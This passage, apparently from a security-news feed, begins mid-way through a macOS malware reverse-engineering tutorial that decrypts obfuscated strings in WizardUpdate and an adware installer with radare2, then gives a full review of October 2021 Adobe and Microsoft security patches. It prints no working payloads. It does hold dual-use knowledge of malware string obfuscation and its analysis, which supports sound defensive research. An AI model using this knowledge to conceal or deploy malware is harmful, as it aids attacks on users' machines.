Then using sed to remove the “str.” prefix and grep to remove the “{MAID}” string, we end up with:

Access to the shell in r2 makes it easy to isolate the strings of interest

As before, we can now pipe these out to a “ciphers” file.

> afns~:1..5[2] | grep -v MAID | sed 's/str.//g' > ciphers

Let’s next turn to the encryption algorithm. Vigenère has a fascinating history. Once thought to be unbreakable, it’s now considered highly insecure for cryptography. In fact, if you like puzzles, you can decrypt a Vigenère cipher with a manual table.

The Vigenère cipher was invented before computers and can be solved by hand

One of the Vigenère cipher’s weaknesses is that it’s possible to discern patterns in the ciphertext that can reveal the length of the key. That problem can be avoided by encrypting a base64 encoding of the plain text rather than the plain text itself.
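For reference, the core of a Vigenère decoder is only a few lines (an illustrative sketch; the key and, crucially, the alphabet must match the ones recovered from the sample):

def vigenere_decrypt(cipher, key, alphabet):
    # Shift each ciphertext symbol back by the position of the
    # corresponding (repeating) key symbol in the alphabet.
    out = []
    for i, ch in enumerate(cipher):
        shift = alphabet.index(key[i % len(key)])
        out.append(alphabet[(alphabet.index(ch) - shift) % len(alphabet)])
    return "".join(out)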

Now, if we jump back into radare2, we’ll see that WizardUpdate does indeed decode the output of the Vigenère function with a base64 decoder.

WizardUpdate malware uses base64 encoding either side of encrypting/decrypting

There is one other thing we need to decipher a Vigenère cipher aside from the key and ciphertext. We also need the alphabet used in the table. Let’s use another r2 feature to see if it can help us find it. Radare2’s search function, /, has some crypto search functionality built in. Use /c? to view the help on this command.

Search for crypto materials with built-in r2 commands

The /ck search gives us a hit which looks like it could function as the Vigenère alphabet.

OK, it’s time to build our decoder. This time, I’m going to adapt a Python script from here and then feed it our ciphers file just as before. The only differences are that I’m going to hardcode the alphabet in the script and run the output through base64. Let’s see how it looks.

Decoding the strings returns base64 as expected

So far so good. Let’s try running those through base64 -D (decode) and see if we get our plain text.

Our decoder returns gibberish after we try to decode the base64

Hmm. The script runs without error, but the final decoded base64 output is gibberish. That suggests that while our key and ciphers are correct, our alphabet might not be.

Returning to r2, let’s search more widely across the strings with iz~string.

Finding cstrings in the TEXT section with r2’s ~ filter

The first hit actually looks similar to the one we tried, but with fewer characters and a different order, which will also affect the result in a Vigenère table. Let’s try again using this as the hardcoded alphabet.

Decoding the WizardUpdate’s encrypted strings back to plain text

Success! The first cipher turns out to be an encoding of the system_profiler command that returns the device’s serial number, while the second contains the attacker’s payload URL. The third downloads the payload and executes it on the victim’s device.

Reading Encrypted Strings In-Memory

Reverse engineering is a multi-faceted puzzle, and often the pieces drop into place in no particular order. When our triage of a malware sample suggests a known or readily identifiable encryption scheme has been used as we saw with macOS.ZuRu and WizardUpdate, decrypting those strings statically can be the first domino that makes the other pieces fall into place.

However, when faced with a recalcitrant sample on which the authors have clearly spent a great deal of time second-guessing possible reversing moves, a ‘cheaper’ option is to detonate the malware and observe the strings as they are decrypted in memory. Of course, to do that, you might need to defeat some anti-analysis and anti-debugging tricks first!

In our third case study, then, we’re going to take a look at a common adware installer. Adware is big business, employs lots of professional coders, and produces code that is every bit as crafty as any sophisticated malware you’re likely to come across. If you spend any time dealing with infected Macs, coming across adware is inevitable, so knowing how to deal with it is essential.

md5 cfcba69503d5b5420b73e69acfec56b7
sha1 e978fbcb9002b7dace469f00da485a8885946371
sha256 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537

Let’s dump this into r2 and see what a quick triage can tell us.

This sample is keeping its secrets

Well, not much! If we print the disassembly for the main function with pdf @main, we see a mass of obfuscated code.

Lots of obfuscated code in this adware installer

However, the only calls here are to system and remove, as we saw from the function list. Let’s quit and reopen in r2’s debugger mode (remember: you may need to chmod the sample and remove any code signature and extended attributes as explained here).
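On macOS, that preparation typically looks something like the following, using this sample’s SHA256 as the file name:

chmod +x 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537
codesign --remove-signature 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537
xattr -c 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537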

sudo r2 -AA -d 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537

Let’s find the entrypoint with the ie command. We’ll set a breakpoint on that and then execute to that point.
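A minimal version of that sequence, relying on the entry0 flag that r2’s analysis creates at the entrypoint, might be:

> ie
> db entry0
> dc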

Breaking on the entrypoint

Now that we’re at main, let’s break on the system call and take a look at the registers. To do that, first get the address of the system flag with:

> f~system

Then set the breakpoint on the address returned with the db command. We can continue execution with dc.
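For example, with a hypothetical address standing in for whatever f~system returns on your run:

> db 0x100003e8a
> dc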

Setting a breakpoint on the system call and continuing execution

Note that in the image above, our first attempt to continue execution results in a warning message and we actually hit our main breakpoint again. If this happens, repeating the dc command should get you past the warning. Now we can look at all the registers with drr.

Revealing the encoded strings in memory

At the rdi register, we can see the beginning of the decrypted string. Let’s see the rest of it.
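We can dump a generous chunk of the string pointed to by rdi with r2’s ps (print string) command:

> ps 2048 @rdi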

The clear text is revealed in the rdi register

Ah, an encoded shell script, typical of Bundlore and Shlayer malware. One of my favorite things about r2 is how you can do a lot of otherwise complex things very easily thanks to the shell integration. Want to pretty-print that script? Just pipe the same command through sed from right within r2.

> ps 2048 @rdi | sed 's/;/\n/g'

We can easily format the output by piping it through the sed utility

More Examples of macOS String Decryption Techniques

WizardUpdate and macOS.ZuRu provided us with some real-world malware samples where we could use the same general technique: identify the encryption algorithm in the functions table, search for and isolate the key and ciphers in the strings, and then find or implement an appropriate decoding algorithm.

Some malware authors, however, will implement custom encryption and decryption schemes and you’ll have to look more closely at the code to see how the decryption routine works. Alternatively, where necessary, we can detonate the code, jump over any anti-analysis techniques and read the decrypted strings directly from memory.

If all this has piqued your interest in string encryption techniques used in macOS malware, then you might like to check out some or all of the following for further study.

EvilQuest, which we looked at in the previous post, is one example of malware that uses a custom encryption and decryption algorithm. SentinelLabs broke the encryption statically, and then created a tool based on the malware’s own decryption algorithm to decrypt any files locked by the malware. Fellow macOS researcher Scott Knight also published his Python decryption routine for EvilQuest, which is worth close study.

Adload is another malware that uses a custom encryption scheme, and for which researchers at Confiant also published decryption code.

Notorious adware dropper platforms Bundlore and Shlayer use a complex and varying set of shell obfuscation techniques which are simple enough to decode but interesting in their own right.

Likewise, XCodeSpy uses a simple but quite effective shell obfuscation trick to hide its strings from simple search tools and regex pattern matches.

Conclusion

In this post, we’ve looked at a variety of different encryption techniques used by macOS malware and how we can tackle these challenges both statically and dynamically. If you haven’t checked out the previous posts in this series, have a look at Part 1 and Part 2. I hope you’ll join us for the next post in this series as we continue to look at common challenges facing macOS malware researchers.

Microsoft Patch Tuesday for Oct. 2021 — Snort rules and prominent vulnerabilities

12 October 2021 at 17:35
By Jon Munshaw, with contributions from Asheer Malhotra. Microsoft released its monthly security update Tuesday, disclosing 78 vulnerabilities in the company’s various software, hardware and firmware offerings. This month’s release is particularly notable because there are only...

The October 2021 Security Update Review

12 October 2021 at 17:28

The second Tuesday of the month is here, and that means the latest security updates from Adobe and Microsoft have arrived. Take a break from your regularly scheduled activities and join us as we review the details for their latest security offerings.

Adobe Patches for October 2021

For October, Adobe released six patches covering 10 CVEs in Adobe Reader, Acrobat Reader for Android, Adobe Campaign Standard, Commerce, Ops-CLI, and Adobe Connect. The update for Adobe Acrobat fixes four bugs in total – two rated Critical and two rated Moderate in severity. Two of these bugs were submitted through the ZDI program. The Critical-rated bugs could allow remote code execution while the Moderate-rated bugs could allow a privilege escalation. The update for Reader for Android fixes a single path traversal bug that could lead to code execution. All require some form of user interaction, such as browsing to a web page or opening a PDF.

Several cross-site scripting (XSS) bugs receive patches this month. The patch for Campaign Standard fixes a DOM-based XSS. The fix for Adobe Commerce addresses a stored XSS. The patch for Adobe Connect fixes two bugs, one of which is a reflected XSS. The other bug is a more severe Critical-rated deserialization vulnerability that could allow remote code execution. The final Adobe patch for October fixes a Critical-rated deserialization bug in Ops-CLI, a Python wrapper for Terraform, Ansible, and SSH for cloud automation.

None of the bugs fixed this month by Adobe are listed as publicly known or under active attack at the time of release.

Microsoft Patches for October 2021

For October, Microsoft released patches today for 71 new CVEs in Microsoft Windows and Windows Components, Microsoft Edge (Chromium-based), Exchange Server, .NET Core and Visual Studio, Microsoft Office Services and Web Apps, SharePoint Server, Microsoft Dynamics, Intune, and System Center Operations Manager. This is in addition to the eight CVEs patched by Microsoft Edge (Chromium-based) earlier this month and three previously released OpenSSL patches, which brings the October total to 82 CVEs – slightly down from last month. A total of 11 of these bugs were submitted through the ZDI program.

Of the 71 CVEs patched today, two are rated Critical, 68 are rated Important, and one is rated Low in severity. Three of today’s patches are listed as publicly known, while one is listed as being under active attack at the time of release. This is in addition to two of the Chromium bugs that were listed as under active attack when Chrome patched on September 30. For those wondering, this month does include patches for the recently released Windows 11 operating system.

Let’s take a closer look at some of the more interesting updates for this month, starting with the kernel bug that’s listed as under active attack:

- CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability
This patch corrected a kernel bug that could be used to escalate privileges on an affected system. Attackers typically use these types of bugs in conjunction with code execution bugs to take over a system. Considering the source of this report, this bug is likely being used in a targeted malware attack. We will also likely see more information about this bug and the associated attack within the next few days.

- CVE-2021-26427 - Microsoft Exchange Server Remote Code Execution Vulnerability
This bug will certainly receive its fair share of attention, if nothing else because it was reported by the National Security Agency (NSA). Judging by the similar CVE number, the NSA likely reported it at the same time as the more severe Exchange issues back in April. This bug is not as severe, since the exploit is limited at the protocol level to a logically adjacent topology and is not reachable from the Internet. Still, this flaw, combined with the other Exchange bugs patched this month, should keep Exchange admins busy for a while.

- CVE-2021-40486 - Microsoft Word Remote Code Execution Vulnerability
This patch corrects a bug that allows code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction as required, the Preview Pane is also listed as an attack vector, which creates a much larger attack surface. When combined with a privilege escalation – like the one currently under active attack – this could be used to take over a target system. This bug came through the ZDI program and results from a failure to validate the existence of an object before performing operations on it.

- CVE-2021-40454 - Rich Text Edit Control Information Disclosure Vulnerability
We don’t often highlight information disclosure bugs, but this vulnerability goes beyond just dumping random memory locations. This bug could allow an attacker to recover cleartext passwords from memory, even on Windows 11. It’s not clear how an attacker would abuse this bug, but if you are using the rich text edit control in Power Apps, definitely test and deploy this patch quickly.

Here’s the full list of CVEs released by Microsoft for October 2021:

CVE Title Severity CVSS Public Exploited Type
CVE-2021-40449 Win32k Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2021-41338 Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability Important 5.5 Yes No SFB
CVE-2021-40469 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 Yes No RCE
CVE-2021-41335 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 Yes No EoP
CVE-2021-40486 Microsoft Word Remote Code Execution Vulnerability Critical 7.8 No No RCE
CVE-2021-38672 Windows Hyper-V Remote Code Execution Vulnerability Critical 8 No No RCE
CVE-2021-40461 Windows Hyper-V Remote Code Execution Vulnerability Critical 8 No No RCE
CVE-2021-41355 .NET Core and Visual Studio Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2021-41361 Active Directory Federation Server Spoofing Vulnerability Important 5.4 No No Spoofing
CVE-2021-41337 Active Directory Security Feature Bypass Vulnerability Important 4.9 No No SFB
CVE-2021-41346 Console Window Host Security Feature Bypass Vulnerability Important 5.3 No No SFB
CVE-2021-40470 DirectX Graphics Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-41363 Intune Management Extension Security Feature Bypass Vulnerability Important 4.2 No No SFB
CVE-2021-41339 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 4.7 No No EoP
CVE-2021-41354 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability Important 4.1 No No XSS
CVE-2021-40457 Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability Important 7.4 No No XSS
CVE-2021-41353 Microsoft Dynamics 365 Sales Spoofing Vulnerability Important 5.4 No No Spoofing
CVE-2021-40472 Microsoft Excel Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-40471 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40473 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40474 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40479 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40485 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-34453 Microsoft Exchange Server Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2021-41348 Microsoft Exchange Server Elevation of Privilege Vulnerability Important 8 No No EoP
CVE-2021-26427 Microsoft Exchange Server Remote Code Execution Vulnerability Important 9 No No RCE
CVE-2021-41350 Microsoft Exchange Server Spoofing Vulnerability Important 6.5 No No Spoofing
CVE-2021-40480 Microsoft Office Visio Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40481 Microsoft Office Visio Remote Code Execution Vulnerability Important 7.1 No No RCE
CVE-2021-40482 Microsoft SharePoint Server Information Disclosure Vulnerability Important 5.3 No No Info
CVE-2021-41344 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8.1 No No RCE
CVE-2021-40487 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8.1 No No RCE
CVE-2021-40484 Microsoft SharePoint Server Spoofing Vulnerability Important 7.6 No No Spoofing
CVE-2021-41330 Microsoft Windows Media Foundation Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40454 Rich Text Edit Control Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-41352 SCOM Information Disclosure Vulnerability Important 7.5 No No Info
CVE-2021-40478 Storage Spaces Controller Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40488 Storage Spaces Controller Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40489 Storage Spaces Controller Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-26441 Storage Spaces Controller Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-41345 Storage Spaces Controller Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40450 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-41357 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40456 Windows AD FS Security Feature Bypass Vulnerability Important 5.3 No No SFB
CVE-2021-40476 Windows AppContainer Elevation Of Privilege Vulnerability Important 7.5 No No EoP
CVE-2021-41347 Windows AppX Deployment Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40468 Windows Bind Filter Driver Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-40475 Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-40443 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40466 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-40467 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-41334 Windows Desktop Bridge Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2021-40477 Windows Event Tracing Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2021-38663 Windows exFAT File System Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-38662 Windows Fast FAT File System Driver Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-41343 Windows Fast FAT File System Driver Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-41340 Windows Graphics Component Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-26442 Windows HTTP.sys Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2021-40455 Windows Installer Spoofing Vulnerability Important 5.5 No No Info
CVE-2021-41336 Windows Kernel Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2021-41331 Windows Media Audio Decoder Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40462 Windows Media Foundation Dolby Digital Atmos Decoders Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-41342 Windows MSHTML Platform Remote Code Execution Vulnerability Important 6.8 No No RCE
CVE-2021-40463 Windows NAT Denial of Service Vulnerability Important 7.7 No No DoS
CVE-2021-40464 Windows Nearby Sharing Elevation of Privilege Vulnerability Important 8 No No EoP
CVE-2021-41332 Windows Print Spooler Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2021-36970 Windows Print Spooler Spoofing Vulnerability Important 8.8 No No Spoofing
CVE-2021-40460 Windows Remote Procedure Call Runtime Security Feature Bypass Vulnerability Important 6.5 No No SFB
CVE-2021-36953 Windows TCP/IP Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2021-40465 Windows Text Shaping Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2021-40483 Microsoft SharePoint Server Spoofing Vulnerability Low 7.6 No No Spoofing
* CVE-2021-37973 Chromium: CVE-2021-37973 Use after free in Portals High N/A No No RCE
* CVE-2021-37974 Chromium: CVE-2021-37974 Use after free in Safe Browsing High N/A No Yes RCE
* CVE-2021-37975 Chromium: CVE-2021-37975 Use after free in V8 High N/A No Yes RCE
* CVE-2021-37977 Chromium: CVE-2021-37977 Use after free in Garbage Collection High N/A No No RCE
* CVE-2021-37978 Chromium: CVE-2021-37978 Heap buffer overflow in Blink High N/A No No RCE
* CVE-2021-37979 Chromium: CVE-2021-37979 Heap buffer overflow in WebRTC High N/A No No RCE
* CVE-2021-37980 Chromium: CVE-2021-37980 Inappropriate implementation in Sandbox High N/A No No RCE
* CVE-2021-37976 Chromium: CVE-2021-37976 Information leak in core Medium N/A No No Info
* CVE-2020-1971 OpenSSL: CVE-2020-1971 EDIPARTYNAME NULL pointer de-reference Important N/A No No DoS
* CVE-2021-3449 OpenSSL: CVE-2021-3449 NULL pointer deref in signature_algorithms processing Important N/A No No DoS
* CVE-2021-3450 OpenSSL: CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT Important N/A No No Info

* Indicates this CVE had previously been released by a 3rd-party and is now being incorporated into Microsoft products.

The remaining Critical-rated bugs fix remote code execution vulnerabilities in Hyper-V server. One of these bugs could allow a guest OS to execute code on the host OS if the guest can cause a memory allocation error within the guest VM. Microsoft provides no details on the other bug, but it could also be used for a guest-to-host escape.

Looking at the remaining 18 code execution bugs, most are within the Office family and require a user to open a specially crafted file. One notable exception is a remote code execution bug in the DNS server. No user interaction is required to exploit this bug, but it does require high privileges, knocking it from Critical down to Important. Microsoft lists this as publicly known but doesn’t state where, which is frustrating. Knowing how widely knowledge of this vulnerability has spread would help network defenders create a true risk assessment for their enterprise. There are also a couple of SharePoint code execution bugs receiving patches, but both require local privileges to exploit. These bugs came through the ZDI program, and we’ll have more details about them in the future. Another interesting RCE bug impacts the MSHTML platform. Although Internet Explorer is now “retired”, it lives on, as the underlying MSHTML, EdgeHTML, and scripting platforms are still supported. There are even patches here for Windows 11. The legacy of IE hasn’t quite left us after all.

Moving on to the privilege escalation bugs, most require an attacker to log on to a system and run their own code to take advantage of an affected component. There’s another kernel bug here, and it is listed as publicly known – again with no additional information or details on the public disclosure. There’s also a privilege escalation in Exchange that requires the attacker to be on an adjacent network. No user interaction is listed, so the likely scenario would be an insider threat.

There are five security feature bypass (SFB) bugs patched in this month’s release. The first is a vulnerability in RPC Runtime that could allow an attacker to bypass Extended Protection for Authentication provided by Service Principal Name (SPN) target name validation. A bug in Windows Active Directory could allow an attacker to bypass the Active Directory Federation Services (AD FS) BannedIPList entries for WS-Trust workflows. Another Active Directory bug could allow an attacker to bypass Active Directory domain permissions for Key Admins groups. The bypass in Intune requires the Intune Management Extension to be installed, but Microsoft provides no further details on what is being bypassed. Microsoft also provides no details on what security feature is being bypassed in either the Console Window Host or the Windows AppContainer Firewall. The lack of details around the container firewall vulnerability is especially frustrating since Microsoft lists this bug as publicly known.

The October release contains fixes for three new Denial-of-Service (DoS) bugs, each of which is significant. The first patch fixes a DoS vulnerability in TCP/IP that impacts all supported versions of Windows – including Windows 11. It’s not clear if this would allow an attacker to completely shut down a system, but without further details from Microsoft, network defenders should assume this worst-case scenario is likely. There’s a DoS bug in Exchange Server, and again, details are scarce. Since the CVSS score lists Availability=High, assume an attacker can abuse this bug to shut down an Exchange server. The final DoS bug getting fixed this month impacts Windows Network Address Translation (NAT) and was discovered by the same researchers that found the TCP/IP bug. Again, the CVSS score indicates this vulnerability could be used to take down a system, so test and deploy these patches quickly.

In addition to the one previously mentioned, there are 13 information disclosure bugs receiving fixes in this month’s release. Most of these simply result in leaks consisting of unspecified memory contents. However, if you’re running the web console of the System Center Operations Manager (SCOM), you definitely want to pay attention to the bug that could disclose file content on an affected system.

The October release is rounded out by fixes for six spoofing bugs and two cross-site scripting (XSS) bugs. Microsoft provides no details on what may be spoofed for any of these vulnerabilities, but the ones for Print Spooler and Exchange stand out. There are only a couple of print spooler bugs in this month’s release, so perhaps the days of PrintNightmare are finally behind us. The only clue we have for the impact of the Exchange spoofing bug is the CVSS rating of Confidentiality=High. This implies a total loss of confidentiality, which is not something you want to be associated with your Exchange server. The remaining spoofing bugs read very close to XSS bugs, including the rare Low severity fix for SharePoint Server.

No new advisories were released this month. The latest servicing stack updates can be found in the revised ADV90001.

Looking Ahead

The next Patch Tuesday falls on November 9, and we’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!
